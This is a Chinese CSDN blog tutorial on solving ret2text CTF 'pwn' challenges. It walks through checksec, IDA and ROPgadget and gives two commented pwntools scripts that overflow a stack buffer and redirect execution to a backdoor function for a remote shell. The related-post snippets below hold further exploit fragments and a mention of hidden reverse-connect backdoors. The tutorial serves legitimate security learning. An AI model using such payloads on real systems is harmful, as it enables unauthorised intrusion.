pwn ret2text 解题步骤

已于 2024-03-12 11:57:17 修改
阅读量203 收藏 1
点赞数 3
文章标签: 安全
于 2024-03-12 11:26:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jingged/article/details/136646118
版权
本文介绍了如何使用checksec分析文件保护,IDA工具反编译查找漏洞,特别是通过找到溢出点和利用ROP技巧(如ROPgadget)来构造payload,实现对远程服务器的控制。文中给出了两个实际的pwn示例,展示了如何构造和发送payload以获取shell权限。
摘要由CSDN通过智能技术生成

1.使用checksec查看文件的信息与保护

checksec 文件名

2.使用ida反编译工具擦看漏洞

先看main函数之后拓展找到溢出点。

擦看溢出数据32位加4字节偏移;64位加8字节偏移。

使用kali命令:

ROPgadget --binary pwn文件 --only "plt|pop|ret"

找到ret地址。

找到后门地址或自己编写后门。

3.写exp

示例:

# 导入pwn库,这是一个用于CTF比赛和二进制漏洞利用的库  
from pwn import *  
  
# 连接到远程的二进制服务,地址是node5.buuoj.cn,端口是27626  
p = remote("node5.buuoj.cn", 27626)  
  
# 定义一个变量backdoor,存储了二进制中某个函数的地址。这个地址可能是一个后门函数,可以让我们获取shell  
backdoor = 0x40117B  
  
# 构造payload。这个payload是为了触发漏洞的。它由两部分组成:  
# 1. b"a"*(0x20+0x8):这部分是填充,目的是覆盖某些内存区域,使得我们控制的内存覆盖到返回地址。  
# 2. p64(backdoor):这部分是将之前定义的backdoor地址转换为64位整数,并放到payload中。当程序执行到这个地址时,它会跳转到backdoor函数。  
payload = b"a"*(0x20+0x8) + p64(backdoor)  
  
# 发送payload到远程服务器  
p.sendline(payload)  
  
# 交互模式,使我们可以与远程服务器进行交互。例如,如果backdoor是一个shell,那么现在我们可以直接在这个shell中执行命令  
p.interactive()

示例2:

# 从pwn库中导入所有功能  
from pwn import *  
  
# 连接到远程服务器,IP地址为1.14.71.254,端口为28026  
p = remote("1.14.71.254", 28026)  
  
# 定义后门函数的地址,当程序执行到这里时,通常会提供某种形式的shell或其他功能  
backdoor = 0x4014BA  
  
# 定义pop_ret指令的地址,这个指令通常是将栈顶的值弹出到指令指针寄存器中,从而执行那个地址上的代码  
# 在漏洞利用中,这常用于控制程序流程  
pop_ret = 0x40101a  
  
# 构造payload。payload通常由两部分组成:  
# 1. b'a'*(0x40+8):这是填充数据,用于覆盖目标程序的某些内存区域,使得栈上的返回地址被覆盖为我们想要的地址  
# 0x40是填充的大小,加上8是因为在64位系统上,返回地址通常占用8字节  
# 2. p64(pop_ret)+p64(backdoor):这是精心构造的返回地址部分。首先,使用pop_ret指令的地址作为第一次返回的地址  
# 当程序执行到pop_ret时,它会将栈顶的下一个地址(即backdoor的地址)弹出到指令指针寄存器,从而跳转到backdoor函数  
payload = b'a'*(0x40+8) + p64(pop_ret) + p64(backdoor)  
  
# 发送payload。sendlineafter函数会在接收到"Make a wish: "这个字符串后发送payload  
# 这意味着payload会被发送到目标程序,并且程序可能正等待用户输入"Make a wish: "后的内容  
p.sendlineafter("Make a wish: ", payload)  
  
# 进入交互模式,使得攻击者可以在远程shell中执行命令  
# 如果backdoor函数确实提供了一个shell,那么现在攻击者就可以控制这台远程服务器了  
p.interactive()

这只是一个示例具体的地址填充需要自己寻找。

Young Jing
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
1.pwn基础总结
admin的博客
10-03 1万+
Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.
pwn学习笔记(2)ret_2_text_or_shellcode
qq_66013948的博客
02-04 1350
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
ret2xx
weixin_50362292的博客
04-02 86
其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程,所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程,ret2text即控制程序本身已有的代码(.text),其实,这种攻击方法是一种笼统的描述,我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets),这就是我们所要说的ROP。我们可以寻找到gadges,poprdi;
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1285
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
c++ 输入字符串_格式化字符串漏洞及利用_萌新食用
weixin_39583655的博客
11-23 228
作者:紫色仰望合天智汇前言格式化字符串漏洞 具有 任意地址读,任意地址写。printfprintf --一个参数:情况1//gcc -g -m32 fmt.c -o fmt #include<stdio.h> #include<stdlib.h> int main() { printf("%pn"); return 0; }当参数 只有 1个字符串的话(含有...
PWN-学习笔记
小龙在线
08-23 723
原理 危险函数:gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门
02-11
pwn 入门
ret2libc1pwn 入门
02-11
pwn 入门
17ret2libc1_64 pwn 入门
02-11
pwn 入门
linux内核启动后门,Linux下编写隐蔽的自启动回连后门
weixin_42407617的博客
04-30 541
一直很想补充LKM方式未实现的ROOTKIT的后门功能,奈何内核模式下虽然权限很高,但编程难度也很大。在网络安全技术中用户级程序虽然权限不高,但是编程相对简单,兼容性好。所以一般ROOTKIT也不是全部在内核中完成的,也要编写用户级的程序来辅助。本文将讲述回连后门的编写和在Linux下隐蔽地自启动的方法。回连后门的编写很容易实现,在一个典型的Socket客户端的基础上,将标准输入输出重定向到Soc...
c++调用栈库函数_MIPS栈溢出初探-二进制漏洞-看雪论坛
weixin_39789327的博客
10-27 253
前言上周,花了一周多一点的时间来学了一些Linux kernel pwn入门,主要是学了Wiki上面的四个利用姿势;具体可以看我的前几篇博客。然后的话,接下来会入门路由器的栈溢出。因为是初学,所以也会尽可能地详细地记录。MIPS32架构堆栈有关MIPS汇编的一些基础知识,可以参考以下我的这一篇博文在计算机科学中,栈是一种具有先进后出队列特性的数据结构。调用栈是指存放某个程序正在运行的函数的信息的栈...
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 490
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 800
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 561
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 1050
区分不同的签名。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 639
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 824
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值